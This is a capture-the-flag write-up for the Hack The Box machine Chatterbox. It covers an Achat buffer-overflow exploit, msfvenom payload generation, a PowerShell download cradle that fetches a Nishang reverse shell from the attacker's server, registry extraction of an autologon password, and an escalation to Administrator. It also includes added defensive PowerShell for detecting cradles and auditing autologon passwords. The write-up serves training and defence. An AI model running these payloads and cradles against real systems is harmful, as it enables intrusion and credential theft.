Hack The Box — Chatterbox — without Metasploit (TJNull’s list for OSCP)
This is my 31st write-up for Chatterbox, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
First, let’s run an nmap scan with default scripts and version detection across all TCP ports to see what services are running on the target system.
nmap -sC -sV -O -Pn -p- -oA nmap/all_ports chatterbox.htb
So, we have an SMB server on ports 139 and 445, and an Achat server on port 9256 with its HTTP interface on port 9255.
Let’s see what we have on the HTTP server.
The page appears to be blank. So, nothing much here.
Initial Foothold
Let’s search for Achat exploits in searchsploit.
searchsploit achat
We will be using the first one, since it is a Python script rather than Metasploit’s Ruby module.
Let’s mirror this exploit to current directory.
searchsploit -m windows/remote/36025.py
Let’s review the code.
Judging by the code, it is a standard Python buffer overflow exploit, and the comment tells us that the embedded payload simply launches calc.exe on the target.
What we need to do is copy the commented msfvenom command, change its payload to a PowerShell reverse shell, and run it to generate a new payload for this Python script, as follows.
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.16.5 LPORT=4242 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
As we generate the payload there is something small to notice: the payload we get is 3694 bytes. But if we look into the code,
it tells us that the maximum payload size is 1152 bytes. Our generated payload must be smaller than that, otherwise it will not work as expected, because the extra bytes spill over the part of the buffer that overwrites the EIP register (if you know how a buffer overflow actually works).
Let’s create our own staged payload. We will take a PowerShell reverse shell off the shelf from the Nishang shells, and then use msfvenom to create a small payload that fetches that shell script from our attacking machine and runs it.
So, first let’s search for the PowerShell shell script. I will be using Invoke-PowerShellTcp.ps1
locate Invoke-PowerShellTcp.ps1
Copy it to our current directory as nishangshell.ps1
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 nishangshell.ps1
Let’s edit it and add the following line at the end of the shell script.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.5 -Port 4242
Where IPAddress is the address of our attacking machine and Port is the port we will be listening on.
Let’s serve this directory over HTTP using Python’s http.server module.
python3 -m http.server 80
We know that the PowerShell command that downloads and executes the shell script is as follows:
iex(new-object net.webclient).downloadstring('http://10.10.16.5:80/nishangshell.ps1')
We will use this command in msfvenom to get the payload for our Python exploit. Let’s copy the commented command from the Python script and modify its CMD parameter so that it looks like this.
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c IEX(New-Object net.webclient).downloadstring('http://10.10.16.5:80/nishangshell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
We get a payload size of 694 bytes. That is doable. Let’s copy the generated payload and overwrite the existing one in the Python exploit.
If we scroll down in the Python script we also see the target server address. Edit that to point at our target. In my case I have put the IP of the machine in my /etc/hosts and given it the name chatterbox.htb, so I will simply be using that. You can use the target IP here.
Now we have our Python exploit ready, embedded with the payload that calls back to our own HTTP server hosting the PowerShell reverse shell (nishangshell.ps1).
Let’s start a listener on port 4242, since we configured nishangshell.ps1 to make a reverse connection to that port.
rlwrap nc -lvnp 4242
All set! Let’s run our python script.
python2 36025.py
As we run our Python exploit, we get a hit on our HTTP server hosting nishangshell.ps1: the target downloads the shell script and executes it.
And we get a reverse shell as user alfred.
(That’s how the staged shells work in the background).
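From the defender’s side, the staged download described above is a classic PowerShell download cradle. As an added example (not part of the original write-up), the following PowerShell function classifies script-block text and flags a block only when it both fetches content over the network and executes it in memory; the sample inputs are constructed and the function name is my own.

```powershell
# Added example, not from the write-up: classify PowerShell script-block text
# and flag download cradles like the IEX/DownloadString one-liner used above.
# Sample inputs are constructed; the function name is my own.
function Test-DownloadCradle {
    param([Parameter(Mandatory)][string]$ScriptText)
    # -match is case-insensitive. 'iex' alone is common in benign scripts, so
    # a block is only flagged when it both fetches over the network AND
    # executes the result in memory.
    $fetch = 'net\.webclient.*\.downloadstring|invoke-webrequest|invoke-restmethod|downloadfile'
    $exec  = '\b(iex|invoke-expression)\b|\[scriptblock\]::create'
    $fetched  = $ScriptText -match $fetch
    $executed = $ScriptText -match $exec
    [pscustomobject]@{
        Suspicious = $fetched -and $executed
        # The privesc step later in the write-up also ran the cradle under other creds.
        RunAsOther = $ScriptText -match 'start-process.*-credential'
        Snippet    = $ScriptText.Substring(0, [Math]::Min(60, $ScriptText.Length))
    }
}

# Constructed samples: the two cradles from this write-up, a plain file
# download, and a harmless iex.
$samples = @(
    "iex(new-object net.webclient).downloadstring('http://10.10.16.5:80/nishangshell.ps1')",
    'Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString(''http://10.10.16.5:80/nishell.ps1'')" -Credential $cred',
    "(New-Object Net.WebClient).DownloadFile('https://example.invalid/a.zip', 'C:\Temp\a.zip')",
    'iex "Get-Date"'
)
$samples | ForEach-Object { Test-DownloadCradle -ScriptText $_ } | Format-Table -AutoSize

# On a live host with Script Block Logging enabled (policy value
# HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging = 1),
# run the same test over event 4104, whose third property is the script text:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Test-DownloadCradle -ScriptText $_.Properties[2].Value } |
#     Where-Object Suspicious
```

Only the first two samples come back Suspicious; the plain DownloadFile and the local iex do not, which keeps the check from drowning in benign hits.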
Privilege Escalation
Let’s see our privileges first.
whoami /priv
SeImpersonatePrivilege is not enabled, so no Juicy Potato style attack would work, I guess.
Let’s see system info.
systeminfo
We have Windows 7 SP1 running, but there are 183 hotfixes installed, which means it is highly unlikely we would find a kernel exploit that escalates privileges for us.
Let’s enumerate the box further. There is a script called PowerUp.ps1 that did a good job in my case.
locate PowerUp.ps1
Let’s copy it to our current directory that’s already being hosted by our HTTP server.
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
Once it is copied to the directory hosted by our HTTP server, let’s fetch it and run it on the target, again using the same PowerShell command we used to craft our msfvenom payload.
iex(new-object net.webclient).downloadstring('http://10.10.16.5:80/PowerUp.ps1')
As soon as we run this we don’t get any results, but our HTTP server again gets a hit for PowerUp.ps1, so the script has been loaded into the session. We need to execute one more command on the target to actually run the checks.
Invoke-AllChecks
It gives us the DefaultPassword for Alfred. DefaultPassword is set for automatic login: when you configure your Windows machine to log in automatically without asking for a password, it is not that the account has no password; the password is stored in the registry, and Windows logs in automatically using the DefaultUserName and DefaultPassword fields there.
You can also get these registry values manually by issuing the following commands in PowerShell:
# FOR DEFAULT USER
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
# FOR DEFAULT PASSWORD
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
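As an added defender-side check (not part of the original write-up), here is a small PowerShell audit that reads the same Winlogon values PowerUp inspects, reports whether a plaintext autologon password is exposed, and offers a remediation that supports -WhatIf; the function names are my own.

```powershell
# Added example, not from the write-up: audit the Winlogon autologon values
# that PowerUp's Invoke-AllChecks reads, and report whether a plaintext
# password sits in the registry. Function names are my own.
$WinlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonExposure {
    param([string]$Path = $WinlogonPath)
    $wl = Get-ItemProperty -Path $Path -ErrorAction Stop
    $hasPassword = -not [string]::IsNullOrEmpty($wl.DefaultPassword)
    # The value itself is deliberately not printed; any local user can read
    # this key, which is exactly how Alfred's password was recovered above.
    $finding = if ($hasPassword) { 'Plaintext DefaultPassword readable by all local users' } else { 'OK' }
    [pscustomobject]@{
        ComputerName    = $env:COMPUTERNAME
        AutoAdminLogon  = ([string]$wl.AutoAdminLogon) -eq '1'
        DefaultUserName = $wl.DefaultUserName
        PasswordStored  = $hasPassword
        Finding         = $finding
    }
}

function Remove-AutoLogonPassword {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string]$Path = $WinlogonPath)
    # Remediation: delete the plaintext value and switch autologon off. If
    # autologon is genuinely required, Sysinternals Autologon stores the
    # password as an LSA secret rather than as a readable REG_SZ value.
    if ($PSCmdlet.ShouldProcess($Path, 'Remove DefaultPassword, set AutoAdminLogon=0')) {
        Remove-ItemProperty -Path $Path -Name DefaultPassword -ErrorAction SilentlyContinue
        Set-ItemProperty -Path $Path -Name AutoAdminLogon -Value '0'
    }
}

Get-AutoLogonExposure | Format-List
# Preview the fix before applying it (needs an elevated shell):
# Remove-AutoLogonPassword -WhatIf
```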
Now, we have the default credentials of Alfred. Let’s try using these credentials against the user Administrator since password reuse is a very common thing that people do.
We are going to store our credentials in a secure string (some requirement that PowerShell has, I came to know about after I looked into it). Then we will send another shell back to our attacking machine from the target using these new credentials.
To save the credentials as secure strings we need to do the following.
$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
In the first command we convert the plaintext password into a secure string and store it in the variable $password. Then in the second command we create a PSCredential object $cred with username Administrator and the password set to our previously created variable $password.
Now let’s copy nishangshell.ps1 on our attacking machine and edit the last line to get this new elevated shell on a different port.
cp nishangshell.ps1 nishell.ps1
I am going to receive my new elevated shell on port 8080.
Now, let’s start a listener on port 8080 and send a request from our target machine to get this new nishell.ps1 script and execute it with the credentials stored in $cred.
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:80/nishell.ps1')" -Credential $cred
As we execute this command on the target, our web server gets a hit for nishell.ps1, and we get an Administrator shell!
:)